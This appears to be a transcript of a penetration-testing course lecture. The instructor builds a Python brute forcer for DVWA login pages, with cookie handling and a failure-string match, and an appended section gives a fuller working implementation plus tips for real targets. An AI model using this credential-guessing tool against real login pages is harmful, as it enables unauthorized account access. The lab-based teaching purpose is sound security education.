Welcome back. In this video, we're going to be creating a brute force tool using our Python skills. So in the previous section, where we talked about web application penetration testing, we covered tools that are used for brute force. But this time, I want to see whether we can create our own tool that will be able to brute force a login page. Now, before we even start, I want to mention that this tool will not be universal. So for every different page, you will have to perform some minor modifications, the same way that we did inside of our Hydra tool and inside of Burp. Nonetheless, let us see how we can create it. So if I type ls and navigate to my Desktop directory here, we've got the Tools directory for our coding projects, and here I'm going to create the webapp test directory, so I will navigate there. And currently this directory is empty. So let's create our Python program. We can type nano and then bruteforce.py. Great. Now there is only one library that we are going to need to perform this project, and that library is the requests library. It will allow us to automate the process of sending GET and POST requests. So let's just import it straight away and let's start our program.
So the first thing that we must think about is what information we need from the user of this program in order to brute force a login page. So we will need the URL, a link to that page, and we're going to need a username for that specific account. Then we're going to run a bunch of passwords against that username. And if we manage to get the correct password, great. We are going to print it to the screen. If we don't manage to find the password, we're going to print "Password not in list". Simple as that. So let's start with that information. First, let's create a variable called url. And that variable is going to be the input value, which means that the user of this program can input which web page they want to brute force. Let's open double quotes and specify that to them. Let's do it like this: "Enter page URL: ". Here they can enter the page URL. And right after we do that, we can create another variable called username, and this variable will do the same thing. So it'll be the same input value, but this time we're going to ask for the username. So let's just type "Enter username for the account to brute force: ". And this is pretty much it for now.
Now, later, we are going to add some other information regarding this project, but for now we only need these two variables. So how are we going to approach this? Well, first, since we have the URL and the username, we can start with opening a file that will contain the passwords that we are going to use to brute force. So we can do that with open, and we can call that file passwords.txt. And this is also something that we can ask the user for, for example the name of the password file to use, and that would actually be a good thing. So what I'm going to do is this: this is another piece of information that we're going to ask from the user, which is password_file = input(, and then "Enter password file to use: ". Simple as that. Let's not forget the single quotes, otherwise this will throw us an error, and let's close the brackets at the end. Now we can open that file by specifying the password file, and we want to open it for reading, so we can specify just 'r' between the single quotes, which means opening the file for reading text. Now here we need to specify how we want to open it. So with open(password_file, 'r') as passwords, that is how we are going to call our file object.
Then we're going to enter a function, which I'm going to call cracking, and this function doesn't exist, we will have to code it, but nonetheless this function will perform the brute forcing. This function will take two arguments. The first one is going to be the username, of course, that we specify at the beginning of the program execution, and the second argument will be the URL. Great, now that we've got this, we need to create the cracking function, and we're going to do it right here, so def cracking, and we specify username and url as the arguments that it needs. So how are we going to do this? Well, we already mentioned that we are going to perform reading of the passwords. So for each password in this password list, we're going to try to send our request to the page with that password and username. And if the response contains some valid argument that we have a valid username and password, we're going to print it to the screen as the correct username and password. And if we get something like "login failed" or something like that, we're going to move on to the next password. So how are we going to do that? Well, we already opened the file for reading that contains our passwords. And now what we can do is we can type for password in passwords. And remember, passwords is our file.
Then for each password inside of that password file, we can first strip it of any additional characters using the strip function, so password will be equal to password.strip(). This will remove any, for example, empty characters or something like that that might cause us a problem in brute forcing this page. Then once we do that, we're going to print to the screen "Trying" and then the password that we are currently trying, just so the user of the program can see which password it is currently trying. Once we do that, we need to send the request to that page. So how can we do that? Well, in this case, since we're going to brute force, as usual, our DVWA login page, first, if I log out, we know that this is being sent with a POST form, so the method of sending the usernames and passwords is POST. And we can check that once again just by finding the form, and we can see that the method is POST. That's why inside of our code we're going to type requests.post. And this requests.post takes two arguments in our case. The first one is going to be the URL, which is logical because we need to tell our program where we want to post that data. And the data that we want to post will be equal to this: data=data. But we don't have the data yet, we need to tell our program what our data is. So how can we do that?
Well, we can go right here and define data, and data has to be a dictionary. Inside of this dictionary we have a key and a value, and we need to specify all the information that the program needs in order to perform a successful login. And that information would most likely be the username, the password and the button that it has to click. Remember the same thing we had in Hydra? We need to click on this button in order to successfully submit the username and password. So how can we define it right here? Well, we define it like this: 'username': username. And this 'username' is just the name of the field on our page, and this is the part of the program that you might need to change depending on the page that you're brute forcing. If the username field on the page that you're brute forcing is called something like user, then you must change this to user. And this right here is just the username that we're sending, which is the one that we asked the user of the program to input at the beginning of execution. The same thing we must do for passwords, and the reason why I'm already typing the username fields is because I already know that the names of the fields are username and password, because we already detected that in our web application penetration testing section.
OK, once we do that, we can do the same for password. And once again, we need to put the password into that password field, and the password will be this stripped value that we read from our passwords file, or from our passwords list. And the last argument that we need to specify is going to be the button. As you remember, once we sent it right here, the button name is Login and the type of button is submit. So we must specify it like that, just this time both of these values are going to be between the single quotes, because neither of them is an actual variable. So this is going to be our data. And in this requests.post, we are sending that data to our URL, and luckily our requests library will perform everything else for us, so it will know where to put this data that we are sending. Of course, instead of just sending this data, we also want to store the response somewhere, so we can create a response variable. And that response variable will be equal to whatever the return value is from the requests.post function. And the return value is going to be the HTML page of the response. Once we receive the response, we have to check whether the password was correct or not. So how can we do that? Well, we can do that the same way that we did inside of Hydra.
Remember that in Hydra we had to specify the string that occurs once we specified the incorrect username and password, which is this down here. As we can see, "Login failed". Well, we can do something similar inside of our program. Let's ask the user of the program. First, we can create a variable login_failed_string, and we can ask the user: "Enter a string that occurs when login fails: ". Simple as that. And once they enter the string, hopefully they enter something like "failed" or "Login failed". They don't have to enter the entire thing. They can just enter "failed", which occurs on this page once you specify an incorrect username and password. Then what we can do is we can check whether we find that string inside of our response. Now, to do that, we must type the if statement, and the if statement will be something like this: if login_failed_string in response.content.decode(), then we have the incorrect password. And the reason why we're decoding this is because otherwise it won't be able to find this value inside of our content. So we must decode it first. And then it is basically searching for this string inside of the HTML page of the response.
If it finds that string, that means we found an incorrect password, because that occurs only when it is incorrect. That's why we're just going to pass. We're not going to do anything. And if it doesn't find it, which would be the else statement, then what we can do is we can print "Found username: " plus the username, and we can print the same thing for the password, so "Found password: " plus password. So this will print the current username, which is always the same, and it will print the current password, which is the one in this iteration of the loop, which will be the correct password because it didn't find this string inside of it. After we find it, we can just exit the program. There is no need to continue brute forcing, so we can just exit out of the program. OK, now that we did this, let us see whether this works. So if I go down here, once we finish the cracking function, we can also print at the end, in case it doesn't find anything, "Password not in list". So we can just do it like this. Once it finishes the cracking function, it will go to this statement and it will print "Password not in list". If it finds the password, it will go to this statement right here and it will exit out of the program, so this will never get printed.
Let's give it a try to see whether this works. So if I save this, the first thing that I want to do is copy the passwords.txt file that I've got on my desktop to /home/mrhacker/Desktop/Tools and then the webapp penetration testing directory. And if I ls here, we are going to have our passwords.txt, and since this seems to be an incorrect passwords.txt file, I'm just going to delete this and I'm going to create a new one. Not really sure where the last one is, but let's just create it real fast. So the passwords can be something like test, test123, 1234567, password123, admin, root, and then the correct password. So we're just going to write "password" right here. And let's also write the password for the gordonb account, just so we can test two different accounts. And let's write another incorrect password at the end, which could be abcabc. OK, this is just a test example of the program. Let's Ctrl+O, and let's python3 bruteforce.py. So the first thing that it asks for is the page URL. So what we can do is we can visit that page, copy the link to that page and paste it right here, the http://192.168.... address of our DVWA login.php page. Click enter, and it asks for the username for the account to brute force.
We're going to use admin. The password file to use is passwords.txt, and make sure, if the password file that you want to use is outside of the directory of your program, you will need to specify the entire path to that file. Once we do that, let's click enter. And it asks us for the string that occurs when login fails, and we can just type "Login failed" because that is what occurs on our page right here. For different pages, this will be different. Press enter. And it found the correct username and correct password, and it did it really fast. It tried these seven passwords, none of those worked, then it went on to "password" and it printed out found username and found password. Let's also try for gordonb just to make sure everything works. So I'm going to paste the link, or just type it in. The username this time is going to be gordonb. The passwords file is going to be passwords.txt. And the string is going to be, once again, "Login failed". Press enter, and it also finds the username and password for that account as well. Great, our program works. But let's also see how we would be able to brute force the inner page of this DVWA application.
We also got this Brute Force page right here, but this is something that we'll have to brute force differently. Why? Well, first, it requires a different type of request. It requires a GET request. And the second thing is, this can only be brute forced within a current session. So if we are not logged into this page, we cannot even access this Brute Force page, and therefore we cannot really brute force it. So we must also see how we can send this session inside of our program so we can be able to brute force this username and password. Let's give it a try. If I go to our program and nano bruteforce.py, the first thing that we must specify, as I already said, is the session. So we need to ask the user for the cookie value of that session. And they can just read it from Burp, just like we did once we covered our Hydra tool. So we can specify right here: "Enter cookie value: ". And this can be optional because we don't always need it, just like we didn't need it currently. But if they're brute forcing something within a session, then they must specify this as well. Now what we can do is, inside of our cracking function, right above the if statement, we can write another if statement. So if...
cookie_value is not equal to an empty string. And if it is equal to an empty string, that means that the user doesn't require the cookie value. And in that case, it will not send the cookie value and it will just brute force without the session. If it is set to something, then we are going to send the cookie value inside of our request. So in this case, if cookie_value is not empty, that means we must send it. So the response will be equal to requests.get. And this time we are using get because inside of this page our form is using the method GET. That's why this time we're using requests.get. This is something that you want to change depending on the page that you're brute forcing. So requests.get, and the first parameter is going to be the URL. For the second parameter, we're going to set our parameters, which we specify like params, and those params are going to be equal to, once again, a dictionary. And that dictionary will be rather the same as this one, just a few minor changes we are going to make. So copy this and we're just going to paste it right here. The first change is under the button. So the username and password fields are named the same as on our last page, as we can see right here inside the form. The name for the username is just username, and the name for the password is password.
But the login is not the same. We've got the value for login to be Login and the name for login to also be Login, so we can set it like this: 'Login', then a colon, and once again 'Login'. And the last parameter to this function, or the last argument to this function, is going to be cookies, which are equal to a dictionary of 'Cookie', a colon, and then the cookie_value variable. And you can read the name of that field by going to our website and, once we, for example, specified test and test123 as our username and password here, I go and find that request inside of Burp. Let's find it real quick, and I believe it is this one right here. Here it is. We can see that the cookie field is named just Cookie. That's why we specified it right here as 'Cookie' between the single quotes, and we paste the cookie value to that field. Once we do all of that, we have all of our parameters to this function, and this seems to not be able to fit inside of my screen, but it doesn't matter. It is there, and all we are left to do right now is create the else statement as well. And the else statement is going to be else: in this case, we don't have the cookie value, so we can just copy this part of the code.
And paste it right here, and now we can delete it from here because we no longer need it. So this program is pretty much only used to brute force the main login page of DVWA and this Brute Force page inside of DVWA. You will need to adjust a few things right here once trying to brute force a different page, such as, for example, the names of the fields, the name of the cookie, and you will also have to adjust whether it is a GET request or a POST request. Everything else, I believe, can stay the same. Now that we've got our code ready, let us see whether this works. So if I save this and I go and try to run this, let's first of all try once again to brute force the main login page by typing DVWA/login.php. The username is going to be admin. The password file is going to be passwords.txt. And the string that occurs is going to be "Login failed". Cookie is going to be optional, so I'm just going to press enter because I don't need it for the main login page, and it will still manage to find it. But let's see whether it will manage to find the correct username and password if I use the cookie value and if I brute force inside of this session. Let's give it a try. I will enter the page URL. The page URL is going to be the URL to this page right here, which is this. So let's copy...
Paste it right here, press enter. The username is going to be the same, so it is going to be admin. The passwords file is going to be the same. The string that occurs is not going to be the same, so let's give it a try and see what happens once we send hello as username and hello as password. We get "username and password incorrect". Now, we don't need to specify this entire statement, we can just specify "incorrect". And if it just finds "incorrect", that means we specified the incorrect password, therefore it is going to go on to the next one. So let's press enter. And the cookie value is something that we can read from our Burp Suite. So let's find the request that we used to send hello and hello as username and password. And here it is. All we need to do from here is find the cookie field and copy the cookie value, so security=high and the session ID is set to a random value. All we need to do is paste that right here and press enter. This will start the brute forcing of our page, and you will notice that this time it goes a little bit slower because we are brute forcing inside of a session. Let's see whether it will manage to find it once it gets to the correct username and password. Let's give it a few seconds, and here it is. It worked successfully.
We found the correct username, which is admin, and the correct password, which is password. And now we can use that to log in to this page. As it says, "Welcome to the password protected area admin". So we successfully coded a brute forcer. Now you can perform some minor changes to make it even better, such as, for example, from termcolor import colored, and this will allow us to print everything in a different color. For example, let's go down here, and this first print statement we can print like this: colored(, and at the end we specify inside of it, for example, let's print this in 'red', and we close the brackets. And once we also find the correct username and password, we can print this in green. So print(colored(, and at the end we add a comma and then 'green' and close the brackets. The same thing we can do right here. And let's not forget the colored function right here, so colored. And now if we run this, python3 bruteforce.py, let's use the regular main page, which is login.php, admin is the account, passwords.txt is the file, and "failed" is going to be the string that occurs. And it is even better right now. It prints the incorrect passwords in red, and once it finds the correct username and password...
it prints it in green. Great, we've coded the whole project. Everything works perfectly. Just don't forget to change certain values inside of our program once you try this on a different web page. The two main things that you need to keep an eye on are the names of the fields inside of the source code. So you just find the form and you see how the fields are named. Then you use that inside of your dictionary. And the next thing that you need to pay attention to is the method that is used to send these usernames and passwords, whether it is a GET method or a POST method. And at last, you also need to check the name of the button. So this can basically be named anything. That's why you always need to view the page source and check it out before running your program. Great. Thank you for watching this coding project. We're getting better and better in Python, and in the next lecture we're going to create another small project in Python that will be used to brute force directory names inside of a web page. This will be a smaller program than this one, but nonetheless it will still be a useful program that you will use in your penetration tests. See you in the next video.
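The brute forcer the lecture walks through, written out as an added example that is not the instructor's code. It keeps the lecture's structure (strip each word, send the form as POST or GET, optional session cookie, negative match on a "login failed" string, stop at the first hit) but separates the request logic from the network transport so the logic can be exercised offline, and it adds two checks a practitioner wants: the cookie header is split into a {name: value} dict, which is what the requests library's cookies= argument expects (a dict keyed 'Cookie' sends a cookie literally named Cookie), and an optional positive success string, because the negative match reports a hit on any page that happens to lack the failure text, such as the login form you are redirected to when the session cookie is missing. The function names (brute_force, parse_cookie_header, requests_send, FakeDvwa, demo), the http://target/ URLs and the FakeDvwa responses are this example's own assumptions; the fake mimics the two DVWA messages quoted in the lecture rather than real DVWA HTML.

```python
"""Added example: a login brute forcer with an injectable transport.
Names and the constructed FakeDvwa below are assumptions of this example."""
from typing import Callable, Dict, Iterable, Optional, Tuple

# A transport takes (method, url, form_fields, cookies) and returns
# (status_code, body_text); injecting it keeps the logic testable offline.
Transport = Callable[[str, str, Dict[str, str], Optional[Dict[str, str]]],
                     Tuple[int, str]]


def parse_cookie_header(raw: str) -> Dict[str, str]:
    """'security=high; PHPSESSID=abc' -> {'security': 'high', 'PHPSESSID': 'abc'},
    the shape requests' cookies= argument expects."""
    jar: Dict[str, str] = {}
    for part in raw.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            jar[name] = value
    return jar


def brute_force(url: str, username: str, passwords: Iterable[str],
                failed_string: str, send: Transport, method: str = "POST",
                field_names: Tuple[str, str] = ("username", "password"),
                extra: Optional[Dict[str, str]] = None, cookie_header: str = "",
                success_string: Optional[str] = None) -> Optional[str]:
    """Return the first password that logs in, or None if the list is exhausted.
    field_names and extra (the submit button) are the per-page parts.
    With success_string set, a hit requires that text (positive match);
    otherwise a hit is the lecture's negative match: failed_string absent."""
    cookies = parse_cookie_header(cookie_header) if cookie_header else None
    user_field, pass_field = field_names
    for raw in passwords:
        password = raw.strip()          # drop the trailing newline from the file
        if not password:
            continue
        data = {user_field: username, pass_field: password, **(extra or {})}
        status, body = send(method, url, data, cookies)
        if status >= 400:               # lockout, WAF or server error: do not guess
            raise RuntimeError(f"HTTP {status} while trying {password!r}")
        if success_string is not None:
            hit = success_string in body
        else:
            hit = failed_string not in body
        if hit:
            return password
    return None


def requests_send(method: str, url: str, data: Dict[str, str],
                  cookies: Optional[Dict[str, str]]) -> Tuple[int, str]:
    """Real transport via the requests library (imported lazily so the module
    loads without it). Redirects are followed, as in the lecture."""
    import requests
    if method.upper() == "GET":
        r = requests.get(url, params=data, cookies=cookies, timeout=10)
    else:
        r = requests.post(url, data=data, cookies=cookies, timeout=10)
    return r.status_code, r.text


class FakeDvwa:
    """Constructed stand-in for the two forms in the lecture (offline)."""
    LOGIN_PAGE = "<form action='login.php' method='post'>Login</form>"

    def __init__(self) -> None:
        self.attempts = 0

    def send(self, method, url, data, cookies) -> Tuple[int, str]:
        self.attempts += 1
        good = data.get("username") == "admin" and data.get("password") == "password"
        if url.endswith("/login.php"):
            return 200, ("Welcome" if good else "<p>Login failed</p>")
        # brute/ needs a GET inside a session; otherwise the server redirects to
        # the login form, which the client follows, so the body is that form.
        if method != "GET" or not cookies or "PHPSESSID" not in cookies:
            return 200, self.LOGIN_PAGE
        return 200, ("Welcome to the password protected area admin" if good
                     else "Username and/or password incorrect.")


# Constructed wordlist, same order as the lecture's passwords.txt.
WORDLIST = ["test", "test123", "1234567", "password123", "admin", "root",
            "password", "abcabc"]


def demo() -> Tuple[Optional[str], Optional[str], Optional[str], Optional[str], int]:
    fake = FakeDvwa()
    login = brute_force("http://target/DVWA/login.php", "admin", WORDLIST,
                        "failed", fake.send, extra={"Login": "Login"})
    brute_url = "http://target/DVWA/vulnerabilities/brute/"
    in_session = brute_force(brute_url, "admin", WORDLIST, "incorrect", fake.send,
                             method="GET", extra={"Login": "Login"},
                             cookie_header="security=high; PHPSESSID=abc123",
                             success_string="Welcome to the password protected area")
    # Without the cookie, negative matching "finds" the very first word,
    # because the login form contains no "incorrect"; positive matching does not.
    no_session_neg = brute_force(brute_url, "admin", WORDLIST, "incorrect",
                                 fake.send, method="GET")
    no_session_pos = brute_force(brute_url, "admin", WORDLIST, "incorrect",
                                 fake.send, method="GET", success_string="Welcome")
    return login, in_session, no_session_neg, no_session_pos, fake.attempts
```

Against a real target, pass requests_send as the transport and the Cookie header value copied from Burp as cookie_header; if the form also carries a hidden token field, fetch the page first and add that value through extra, since a fixed dictionary cannot supply it.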